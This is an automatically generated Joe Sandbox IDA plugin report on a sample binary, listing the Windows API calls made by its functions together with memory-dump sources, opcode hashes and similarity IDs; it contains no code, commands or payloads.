                                                                                                                                                        • Instruction ID: a82aaffc717de2f35d347eeb213f27116e4699a6e6c5106ca2984f934d41422e
                                                                                                                                                        • Opcode Fuzzy Hash: 0e8b7e01307bc7853f0e0f77b8cf23e099ba49874d83c0c9acd80c9978112ccb
                                                                                                                                                        • Instruction Fuzzy Hash: AC31C172608340ABDF21EB64DC51BDEB7F8AF54311F04495AF685931A1DF709A48CB92
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                                                                                                                                                          • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                                                                                                                                                          • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AF8F69
                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00AF8F70
                                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AF8F85
                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00AF8F8D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                                        • API String ID: 4146253029-1011021900
                                                                                                                                                        • Opcode ID: 429dc97ca0efbdb5dbab28e99d548755e19f321c6fc39bf896f38d584e9200e3
                                                                                                                                                        • Instruction ID: 77bc8e72b1eda64cf36e6f5532e7d76e3a10b583b0eddb887f8976c154779278
                                                                                                                                                        • Opcode Fuzzy Hash: 429dc97ca0efbdb5dbab28e99d548755e19f321c6fc39bf896f38d584e9200e3
                                                                                                                                                        • Instruction Fuzzy Hash: EA21AC71200209AFEF104FA4EC80EBB77AEEF49364F104628FB1597191CB79DC509760
                                                                                                                                                        APIs
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00ADE392
                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00ADE3E6
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ADE3FF
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B2DBF0), ref: 00ADE43D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                        • String ID: %lu
                                                                                                                                                        • API String ID: 3164766367-685833217
                                                                                                                                                        • Opcode ID: 6110757e9f0c7a2bef16e6954b2dc749e4dbceb1f3ab2d7c209049709dba5daf
                                                                                                                                                        • Instruction ID: 10662ec598aa333e649a9c6fd778e4db25fc0e6c50f21570191aaf1e020628cc
                                                                                                                                                        • Opcode Fuzzy Hash: 6110757e9f0c7a2bef16e6954b2dc749e4dbceb1f3ab2d7c209049709dba5daf
                                                                                                                                                        • Instruction Fuzzy Hash: BA214F75A40108AFCB10EB64C985EEEB7F8EF99714B1080A9F509EB251D631DA05CB50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                          • Part of subcall function 00ACD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ACD640
                                                                                                                                                          • Part of subcall function 00ACD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACD653
                                                                                                                                                          • Part of subcall function 00ACD623: GetCurrentThreadId.KERNEL32 ref: 00ACD65A
                                                                                                                                                          • Part of subcall function 00ACD623: AttachThreadInput.USER32(00000000), ref: 00ACD661
                                                                                                                                                        • GetFocus.USER32 ref: 00ACD7FB
                                                                                                                                                          • Part of subcall function 00ACD66C: GetParent.USER32(?), ref: 00ACD67A
                                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00ACD844
                                                                                                                                                        • EnumChildWindows.USER32(?,00ACD8BA), ref: 00ACD86C
                                                                                                                                                        • __swprintf.LIBCMT ref: 00ACD886
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                                                        • String ID: %s%d
                                                                                                                                                        • API String ID: 1941087503-1110647743
                                                                                                                                                        • Opcode ID: 03544114f8fd05b334b7398a883a886671f16a0d3ceb42f7af2c4ef5d2bcdfd2
                                                                                                                                                        • Instruction ID: d798cc8805b90a16383d3329afd0522796139e8b7c6071aa3bd316cdfa6d7b3a
                                                                                                                                                        • Opcode Fuzzy Hash: 03544114f8fd05b334b7398a883a886671f16a0d3ceb42f7af2c4ef5d2bcdfd2
                                                                                                                                                        • Instruction Fuzzy Hash: A111AF756102056BDF11BF608D86FEA37A9AB44704F0180B9BA0DAB186CBB45945DB70
                                                                                                                                                        APIs
                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AF18E4
                                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AF1917
                                                                                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AF1A3A
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF1AB0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2364364464-0
                                                                                                                                                        • Opcode ID: bf2bb856df82080dc71f1fb998e7fc3f00b4ffccee72b03ae7945e61e45e6e6b
                                                                                                                                                        • Instruction ID: d78ebad5883591a2f69f5fd4f9404d53c3cea250ed1693ce7ca24132fb405baa
                                                                                                                                                        • Opcode Fuzzy Hash: bf2bb856df82080dc71f1fb998e7fc3f00b4ffccee72b03ae7945e61e45e6e6b
                                                                                                                                                        • Instruction Fuzzy Hash: 0F817174A40205EBDF10EF64C986BAD7BF5AF49760F148459F905AF3C2D7B8E9408B90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00AF05DF
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00AF066E
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AF068C
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00AF06D2
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00AF06EC
                                                                                                                                                          • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                                                                                                                                                          • Part of subcall function 00AAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 327935632-0
                                                                                                                                                        • Opcode ID: 9f6ab9ec96eaadc3a69bc20b503804999f869a7dbeb01a46970548d9a0d6f90c
                                                                                                                                                        • Instruction ID: 9bb7148faf560aae4ca760f10a129099906dc71bad27666b16a5a8145ae1aff0
                                                                                                                                                        • Opcode Fuzzy Hash: 9f6ab9ec96eaadc3a69bc20b503804999f869a7dbeb01a46970548d9a0d6f90c
                                                                                                                                                        • Instruction Fuzzy Hash: 49513575A006099FCF00EFA8CA91EADF7F5AF58310B1480A5FA15AB352DB70AD55CB90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2DE0
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AF2E1F
                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AF2E66
                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00AF2E92
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AF2E9F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3440857362-0
                                                                                                                                                        • Opcode ID: c04cf2d4933937155b0d22d1afa394279d7518742e61e25affb812b1bd64a5da
                                                                                                                                                        • Instruction ID: 944472f0f2ac4ea5844dbf3a43a8b1e341196501273be794c2228f412924721d
                                                                                                                                                        • Opcode Fuzzy Hash: c04cf2d4933937155b0d22d1afa394279d7518742e61e25affb812b1bd64a5da
                                                                                                                                                        • Instruction Fuzzy Hash: 93515C71204209AFDB05EFA4C991F6BB7E9FF88314F14481EF6958B2A1DB31E905CB52
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fca8b5f311ae7cf9e032c91f7cff4f091652f54ab9d391426ffcb932da758b4b
                                                                                                                                                        • Instruction ID: 43f24b38afcab436310d3d00463680a4c791cf41982dc2f35e2324ace1b40375
                                                                                                                                                        • Opcode Fuzzy Hash: fca8b5f311ae7cf9e032c91f7cff4f091652f54ab9d391426ffcb932da758b4b
                                                                                                                                                        • Instruction Fuzzy Hash: 6341D23990020DBBD720DBA9CE49FF9BBB9EB09330F154265FA19A72D1C7709D01D650
                                                                                                                                                        APIs
                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AE17D4
                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AE17FD
                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AE183C
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AE1861
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AE1869
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1389676194-0
                                                                                                                                                        • Opcode ID: 657d1214cc05b4f5a96be43f8b59f55c382b5687922582d18bc274ab9f9b7e98
                                                                                                                                                        • Instruction ID: 443dac4123efd31c8f7f7c2913f755133fc330d45e66e1bcf213cdade32c2a02
                                                                                                                                                        • Opcode Fuzzy Hash: 657d1214cc05b4f5a96be43f8b59f55c382b5687922582d18bc274ab9f9b7e98
                                                                                                                                                        • Instruction Fuzzy Hash: 7941F835A00215DFCF11EF65CA81AADBBF5EF49310B148099E806AB361DB35ED51DFA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetCursorPos.USER32(000000FF), ref: 00AAB749
                                                                                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00ACC156
                                                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00ACC200
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00ACC208
                                                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00ACC216
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00ACC21E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                        APIs
                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00ACE9CD
                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ACE9EA
                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ACEA22
                                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ACEA48
                                                                                                                                                        • _wcsstr.LIBCMT ref: 00ACEA52
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3902887630-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AFDCC0
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00AFDCE4
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AFDCFC
                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00AFDD24
                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00AE407D,00000000), ref: 00AFDD42
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ACCA86
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ACCAB8
                                                                                                                                                        • __itow.LIBCMT ref: 00ACCAD0
                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ACCAF6
                                                                                                                                                        • __itow.LIBCMT ref: 00ACCB07
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2983881199-0
                                                                                                                                                        APIs
                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00AE89CE
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00AE89E5
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00AE8A21
                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00AE8A2D
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00AE8A68
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                        APIs
                                                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                                                                                                                                                        • BeginPath.GDI32(?), ref: 00AAB611
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AAB63B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                                        APIs
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00AB2E81
                                                                                                                                                        • CreateThread.KERNEL32(?,?,00AB2FB7,00000000,?,?), ref: 00AB2EC5
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00AB2ECF
                                                                                                                                                        • _free.LIBCMT ref: 00AB2ED8
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00AB2EE3
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2664167353-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                                                                                                                                                        • GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00ACB3CB), ref: 00ACB923
                                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 883493501-0
                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD8371
                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AD837F
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AD8387
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AD8391
                                                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
